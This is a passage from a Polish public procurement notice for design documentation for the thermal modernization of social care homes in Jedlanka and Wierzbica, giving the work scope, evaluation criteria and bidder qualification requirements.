20<br/>6 dni kalendarzowych - 15<br/>7 dni kalendarzowych - 10<br/>8 dni kalendarzowych i powyżej - 0<br/>UWAGA!<br/>Wykonawca określi czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia w jednym z powyższych okresów. W przypadku, gdy Wykonawca nie zaoferuje żadnego czasu reakcji na zgłoszenia dotyczące przedmiotu zamówienia lub zadeklaruje czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia powyżej 7 dni kalendarzowych Zamawiający przyjmie, iż zaoferował minimalny tj. 8<br/>dni kalendarzowych i przyjmie wartość – 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na zgłoszenie dotyczące przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 - DPS w Jedlance, Jedlanka 10, 26-660 Jedlińsk – Budynek mieszkalny nr 2 Termomodernizacja Domu Pomocy<br/>Społecznej w Jedlance:<br/>􀀀 Ocieplenie ścian zewnętrznych budynku 5 cm warstwą styropianu o współczynniku 􀀀 max 0,033 W/mK. Do wykonania 670,40 m2 ocieplenia ścian.<br/>􀀀 Wymiana okien na okna plastikowe o współczynniku przenikania ciepła nie wyższym niż 0,9 W/m2K. Do wymiany 58,74 m2 okien.<br/>􀀀 Wymiana drzwi zewnętrznych na drzwi aluminiowe o współczynniku przenikania ciepła nie wyższym niż 1,3 W/m2K. Do wymiany 7,20 m2 drzwi.<br/>􀀀 Całkowita wymiana systemu grzewczego obejmująca wymianę instalacji.<br/>Do wymiany 32 sztuki grzejników.<br/>Szczegółowy opis przedmiotu zamówienia zawarty został w załączniku nr 1 do SWZ – załącznik 1c dla części 3 oraz projekcie Umowy załącznik nr 2 do SWZ i dokumentacji pomocniczej (audyty energetyczne) – załącznik nr 10 (dla cz. 3 –10c) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71200000-0 - Usługi architektoniczne i podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71244000-0 - Kalkulacja kosztów, monitoring kosztów</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert określonych w<br/>SWZ.<br/>2. Zamawiający będzie oceniał oferty, które nie zostały odrzucone, według następujących kryteriów dla każdej części:<br/>Nr Nazwa kryterium Waga/Znaczenie<br/>1 Cena [C] 60 pkt<br/>2 Czas reakcji na zgłoszenie dotyczące przedmiotu zamówienia 40 pkt<br/>3. Za najkorzystniejszą uznana zostanie ta z ocenianych ofert, która uzyska najwyższą ocenę punktową.<br/>4. Dla zastosowanych kryteriów oceny ofert Zamawiający będzie obliczał wartość punktową oferty (zaokrągloną do dwóch miejsc po<br/>przecinku) w oparciu o następujący wzór:<br/>Dla każdej części<br/>4.1. Cena [C]<br/>Ocena w zakresie kryterium „Cena” będzie dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego<br/>wzoru (liczba punktów możliwych do uzyskania – 60 pkt.<br/>C = (Cn / Cb) x 100<br/>gdzie:<br/>C - ilość punktów za kryterium „Cena”<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych<br/>Cb - cena oferty badanej.<br/>4.2 Czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia<br/>Ocena w zakresie kryterium „Czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia” będzie dokonywana na podstawie ilości<br/>punktów otrzymanych przy zastosowaniu następującego wzoru (liczba punktów możliwych do uzyskania – 40 pkt).<br/>W ramach kryterium czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia ocenie podlegać będzie deklarowany czas reakcji na zgłoszenie dotyczące przedmiotu zamówienia liczony od dnia przekazania zgłoszenia.<br/>Wykonawca zobowiązany jest określić czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia w jednym z poniższych okresów.<br/>Lp. czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia<br/>Ilość punktów<br/>1 dzień kalendarzowy - 40<br/>2 dni kalendarzowe - 35<br/>3 dni kalendarzowe - 30<br/>4 dni kalendarzowe - 25<br/>5 dni kalendarzowe - 20<br/>6 dni kalendarzowych - 15<br/>7 dni kalendarzowych - 10<br/>8 dni kalendarzowych i powyżej - 0<br/>UWAGA!<br/>Wykonawca określi czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia w jednym z powyższych okresów. W przypadku, gdy Wykonawca nie zaoferuje żadnego czasu reakcji na zgłoszenia dotyczące przedmiotu zamówienia lub zadeklaruje czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia powyżej 7 dni kalendarzowych Zamawiający przyjmie, iż zaoferował minimalny tj. 8<br/>dni kalendarzowych i przyjmie wartość – 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na zgłoszenie dotyczące przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 - DPS w Wierzbicy, ul. Sienkiewicza 37, 26-680 Wierzbica Termomodernizacja Domu Pomocy Społecznej w Wierzbicy – ul. Sienkiewicza 37, 26-680 Wierzbica:<br/>􀀀 Ocieplenie ścian zewnętrznych budynku 6 cm warstwą styropianu o współczynniku 􀀀 max 0,033 W/mK. Do wykonania<br/>1997,96 m2 ocieplenia ścian.<br/>􀀀 Ocieplenie stropodachu niewentylowanego 15 cm warstwą styropapy o współczynniku 􀀀 max 0,040 W/mK. Do wykonania 1618,63 m2 ocieplenia.<br/>􀀀 Wymiana okien na okna plastikowe o współczynniku przenikania ciepła nie wyższym niż 0,9 W/m2K. Do wymiany 573,73 m2 okien.<br/>􀀀 Wymiana drzwi zewnętrznych na drzwi aluminiowe o współczynniku przenikania ciepła nie wyższym niż 1,3 W/m2K. Do wymiany 30,85 m2 drzwi.<br/>􀀀 Całkowita wymiana systemu grzewczego obejmująca wymianę instalacji.<br/>Do wymiany 160 sztuk grzejników.<br/>􀀀 Montaż na dachu budynku paneli fotowoltaicznych. Moc pojedynczego panelu ok. 400 W. Ogółem zainstalowanych zostanie ok. 30 paneli.<br/>Szczegółowy opis przedmiotu zamówienia zawarty został w załączniku nr 1 do SWZ – załącznik 1d dla części 4 oraz projekcie Umowy załącznik nr 2 do SWZ i dokumentacji pomocniczej (audyty energetyczne) – załącznik nr 10 (dla cz. 4- 10d) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71200000-0 - Usługi architektoniczne i podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71244000-0 - Kalkulacja kosztów, monitoring kosztów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert określonych w<br/>SWZ.<br/>2. Zamawiający będzie oceniał oferty, które nie zostały odrzucone, według następujących kryteriów dla każdej części:<br/>Nr Nazwa kryterium Waga/Znaczenie<br/>1 Cena [C] 60 pkt<br/>2 Czas reakcji na zgłoszenie dotyczące przedmiotu zamówienia 40 pkt<br/>3. Za najkorzystniejszą uznana zostanie ta z ocenianych ofert, która uzyska najwyższą ocenę punktową.<br/>4. Dla zastosowanych kryteriów oceny ofert Zamawiający będzie obliczał wartość punktową oferty (zaokrągloną do dwóch miejsc po<br/>przecinku) w oparciu o następujący wzór:<br/>Dla każdej części<br/>4.1. Cena [C]<br/>Ocena w zakresie kryterium „Cena” będzie dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego<br/>wzoru (liczba punktów możliwych do uzyskania – 60 pkt.<br/>C = (Cn / Cb) x 100<br/>gdzie:<br/>C - ilość punktów za kryterium „Cena”<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych<br/>Cb - cena oferty badanej.<br/>4.2 Czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia<br/>Ocena w zakresie kryterium „Czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia” będzie dokonywana na podstawie ilości<br/>punktów otrzymanych przy zastosowaniu następującego wzoru (liczba punktów możliwych do uzyskania – 40 pkt).<br/>W ramach kryterium czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia ocenie podlegać będzie deklarowany czas reakcji na zgłoszenie dotyczące przedmiotu zamówienia liczony od dnia przekazania zgłoszenia.<br/>Wykonawca zobowiązany jest określić czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia w jednym z poniższych okresów.<br/>Lp. czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia<br/>Ilość punktów<br/>1 dzień kalendarzowy - 40<br/>2 dni kalendarzowe - 35<br/>3 dni kalendarzowe - 30<br/>4 dni kalendarzowe - 25<br/>5 dni kalendarzowe - 20<br/>6 dni kalendarzowych - 15<br/>7 dni kalendarzowych - 10<br/>8 dni kalendarzowych i powyżej - 0<br/>UWAGA!<br/>Wykonawca określi czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia w jednym z powyższych okresów. W przypadku, gdy Wykonawca nie zaoferuje żadnego czasu reakcji na zgłoszenia dotyczące przedmiotu zamówienia lub zadeklaruje czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia powyżej 7 dni kalendarzowych Zamawiający przyjmie, iż zaoferował minimalny tj. 8<br/>dni kalendarzowych i przyjmie wartość – 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 - DPS w Wierzbicy, ul. Partyzantów 3, 26-680 Wierzbica Termomodernizacja Domu Pomocy Społecznej w Wierzbicy – ul. Partyzantów 3, 26-680 Wierzbica:<br/>􀀀 Ocieplenie ścian zewnętrznych budynku 10 cm warstwą styropianu o współczynniku 􀀀 max 0,033 W/mK. Do wykonania 513,38 m2 ocieplenia ścian.<br/>􀀀 Ocieplenie stropu poddasza 16 cm warstwą wełny mineralnej o współczynniku 􀀀max 0,040 W/mK. Do wykonania 637,71 m2 ocieplenia.<br/>􀀀 Wymiana okien na okna plastikowe o współczynniku przenikania ciepła nie wyższym niż 0,9 W/m2K. Do wymiany 147,52 m2 okien.<br/>􀀀 Wymiana drzwi zewnętrznych na drzwi aluminiowe o współczynniku przenikania ciepła nie wyższym niż 1,3 W/m2K. Do wymiany 12,18 m2 drzwi.<br/>􀀀 Regulacja instalacji c.o. po dokonanych pracach modernizacyjnych.<br/>􀀀 Montaż na dachu budynku paneli fotowoltaicznych. Moc pojedynczego panelu ok. 400 W. Ogółem zainstalowanych zostanie ok. 25 paneli.<br/>Szczegółowy opis przedmiotu zamówienia zawarty został w załączniku nr 1 do SWZ – załącznik 1e dla części 5 oraz projekcie Umowy załącznik nr 2 do SWZ i dokumentacji pomocniczej (audyty energetyczne) – załącznik nr 10 (dla cz. 5- 10e) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71200000-0 - Usługi architektoniczne i podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71244000-0 - Kalkulacja kosztów, monitoring kosztów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert określonych w<br/>SWZ.<br/>2. Zamawiający będzie oceniał oferty, które nie zostały odrzucone, według następujących kryteriów dla każdej części:<br/>Nr Nazwa kryterium Waga/Znaczenie<br/>1 Cena [C] 60 pkt<br/>2 Czas reakcji na zgłoszenie dotyczące przedmiotu zamówienia 40 pkt<br/>3. Za najkorzystniejszą uznana zostanie ta z ocenianych ofert, która uzyska najwyższą ocenę punktową.<br/>4. Dla zastosowanych kryteriów oceny ofert Zamawiający będzie obliczał wartość punktową oferty (zaokrągloną do dwóch miejsc po<br/>przecinku) w oparciu o następujący wzór:<br/>Dla każdej części<br/>4.1. Cena [C]<br/>Ocena w zakresie kryterium „Cena” będzie dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego<br/>wzoru (liczba punktów możliwych do uzyskania – 60 pkt.<br/>C = (Cn / Cb) x 100<br/>gdzie:<br/>C - ilość punktów za kryterium „Cena”<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych<br/>Cb - cena oferty badanej.<br/>4.2 Czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia<br/>Ocena w zakresie kryterium „Czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia” będzie dokonywana na podstawie ilości<br/>punktów otrzymanych przy zastosowaniu następującego wzoru (liczba punktów możliwych do uzyskania – 40 pkt).<br/>W ramach kryterium czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia ocenie podlegać będzie deklarowany czas reakcji<br/>na zgłoszenie dotyczące przedmiotu zamówienia liczony od dnia przekazania zgłoszenia.<br/>Wykonawca zobowiązany jest określić czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia w jednym z poniższych okresów.<br/>Lp. czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia<br/>Ilość punktów<br/>1 dzień kalendarzowy - 40<br/>2 dni kalendarzowe - 35<br/>3 dni kalendarzowe - 30<br/>4 dni kalendarzowe - 25<br/>5 dni kalendarzowe - 20<br/>6 dni kalendarzowych - 15<br/>7 dni kalendarzowych - 10<br/>8 dni kalendarzowych i powyżej - 0<br/>UWAGA!<br/>Wykonawca określi czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia w jednym z powyższych okresów. W przypadku, gdy Wykonawca nie zaoferuje żadnego czasu reakcji na zgłoszenia dotyczące przedmiotu zamówienia lub zadeklaruje czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia powyżej 7 dni kalendarzowych Zamawiający przyjmie, iż zaoferował minimalny tj. 8 dni kalendarzowych i przyjmie wartość – 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na zgłoszenie dotyczące przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VIII SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu dotyczące:<br/>1.1. Zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>1.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie określa warunku w ww. zakresie<br/>1.3. Sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>1.4. Zdolności technicznej lub zawodowej;<br/>1.4.1. Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, iż dysponuje lub będzie dysponował osobami posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania niniejszego zamówienia zgodnie z poniższymi wymaganiami (dla wszystkich części):<br/>a) co najmniej jedną osobę – która będzie pełniła funkcję projektanta branży architektonicznej, posiadającą uprawnienia do projektowania bez ograniczeń<br/>w specjalności architektonicznej w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. 2025, poz. 418) oraz zgodnie z Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. 2019, poz. 831) lub odpowiadające im ważne uprawnienia budowlane*<br/>b) co najmniej jedną osobę – która będzie pełniła funkcję projektanta branży konstrukcyjnej, posiadającą uprawnienia do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej, w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. 2025, poz. 418) oraz zgodnie z Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. 2019, poz. 831) lub odpowiadające im ważne uprawnienia budowlane*<br/>c) co najmniej jedną osobę – która będzie pełniła funkcję projektanta branży sanitarnej, posiadającą uprawnienia do projektowania bez ograniczeń w specjalności w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane<br/>(Dz.U. 2025, poz. 418) oraz zgodnie z Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. 2019, poz. 831) lub odpowiadające im ważne uprawnienia budowlane*<br/>d) co najmniej jedną osobę – która będzie pełniła funkcję projektanta branży instalacyjnej, posiadającą uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. 2025, poz. 418) oraz zgodnie z Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. 2019, poz. 831) lub odpowiadające im ważne uprawnienia budowlane*<br/>UWAGI:<br/>W przypadku każdych z ww. wymaganych uprawnień, Zamawiający jako „odpowiadające im uprawnienia budowlane” rozumie uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, lub osoba skierowana do realizacji zamówienia publicznego posiada odpowiednie kwalifikacje zawodowe, nabyte w drodze odpowiedniej procedury w<br/>odniesieniu do podmiotów będących obywatelami państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państwczłonkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) – stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub określonych działalności,<br/>jeżeli te kwalifikacje zostały uznane na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2023r. poz. 334).<br/>Zamawiający akceptuje uprawnienia równoważne do wymaganych uzyskane w innych państwach, uznane w myśl art. 12a ustawy Prawo budowlane.<br/>Zamawiający dopuszcza łączenie kilku funkcji przez jedną osobę w przypadku posiadania przez nią kilku rodzajów wymaganych uprawnień budowlanych lub kwalifikacji. Przez budynek użyteczności publicznej należy rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych,<br/>turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek przeznaczony do wykonywania podobnych funkcji; za budynek użyteczności publicznej uznaje się także budynek biurowy lub socjalny.<br/>2. Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, iż nie wcześniej niż w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał w sposób należyty:<br/>2.1) dla części 1 (ZSP w Iłży) - co najmniej jedną dokumentację projektową dotyczącą termomodernizacji dla budynków użyteczności publicznej lub zbiorowego zamieszkania, o wartości nie mniejszej niż: 60 000,00 zł brutto (słownie: sześćdziesiąt tysięcy złotych 00/100), przy czym Wykonawca zobowiązany jest oświadczyć i wskazać, że posiada rekomendację czynnego udziału w naradach oraz aktywnego uczestnictwa w procesie inwestycyjnym podczas realizacji wskazanej inwestycji.<br/>2.2) dla części 2 (ZS w Pionkach) - co najmniej jedną dokumentację projektową dotyczącą termomodernizacji dla budynków użyteczności publicznej lub zbiorowego zamieszkania, o wartości nie mniejszej niż: 60 000,00 zł brutto (słownie: sześćdziesiąt tysięcy złotych 00/100), przy czym Wykonawca zobowiązany jest oświadczyć i wskazać, że posiada rekomendację czynnego udziału w naradach oraz aktywnego uczestnictwa w procesie inwestycyjnym podczas realizacji wskazanej inwestycji.<br/>2.3. dla części 3 (DPS w Jedlance) - co najmniej jedną dokumentację projektową dotyczącą termomodernizacji dla budynków użyteczności publicznej lub zbiorowego zamieszkania, o wartości nie mniejszej niż: 30 000,00 zł brutto (słownie: trzydzieści tysięcy złotych 00/100), przy czym Wykonawca zobowiązany jest oświadczyć i wskazać, że posiada rekomendację czynnego udziału w naradach oraz aktywnego uczestnictwa w procesie inwestycyjnym podczas realizacji wskazanej inwestycji.<br/>2.4 ) dla części 4 (DPS w Wierzbicy ul. Sienkiewicza 37) - co najmniej jedną dokumentację projektową dotyczącą termomodernizacji dla budynków użyteczności publicznej lub zbiorowego zamieszkania, o wartości nie mniejszej niż: 60 000,00 zł brutto (słownie: sześćdziesiąt tysięcy złotych 00/100), przy czym Wykonawca zobowiązany jest oświadczyć i wskazać, że posiada rekomendację czynnego udziału w naradach oraz aktywnego uczestnictwa w procesie inwestycyjnym podczas realizacji wskazanej inwestycji.<br/>2.5) dla części 5 (DPS w Wierzbice ul. Partyzantów 3 ) - co najmniej jedną dokumentację projektową dotyczącą termomodernizacji dla budynków użyteczności publicznej lub zbiorowego zamieszkania, o wartości nie mniejszej niż: 30 000,00 zł brutto (słownie: trzydzieści tysięcy złotych 00/100), przy czym Wykonawca zobowiązany jest oświadczyć i wskazać, że posiada rekomendację czynnego udziału w naradach oraz aktywnego uczestnictwa w procesie inwestycyjnym podczas realizacji wskazanej inwestycji.<br/>Uwagi:<br/>1. Mając na uwadze art. 117 ust. 1 ustawy Pzp. w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub korzystania z zasobów podmiotów trzecich na podst. art. 118 ustawy Pzp. minimum jeden Wykonawca lub jeden podmiot udostępniający zasoby musi posiadać pełne doświadczenie wskazane w warunku udziału w postępowaniu. Zamawiający tym samym nie dopuszcza sumowania (łączenia potencjału) w zakresie tego warunku udziału w postępowaniu, gdyż wypaczałoby to cel, który powinien zostać osiągnięty poprzez tak postawiony warunek.<br/>2. W przypadku, gdy usługi referencyjne w rzeczywistości były wykonywane przez Wykonawcę w ramach konsorcjum wraz<br/>z innym Wykonawcą lub Wykonawcami, należy w Wykazie usług, wskazać jakie czynności w ramach tych usług były wykonywane przez Wykonawcę ubiegającego się o niniejsze zamówienie. Faktyczny wkład konsorcjanta w prowadzeniu działań może polegać w szczególności na osobistym wykonaniu usług.<br/>3. W przypadku, gdy ww. zakres usług, będzie stanowił część usługi o szerszym zakresie, Wykonawca zobowiązany jest wyodrębnić rodzajowo i kwotowo, usługi niezbędne do wykazania spełniania warunku udziału w postępowaniu.<br/>4. Ww. wykonane lub wykonywane usługi muszą być potwierdzone dowodami określającymi, czy usługi te zostały wykonane lub są wykonywane należycie;<br/>- przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –oświadczenie Wykonawcy;w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu 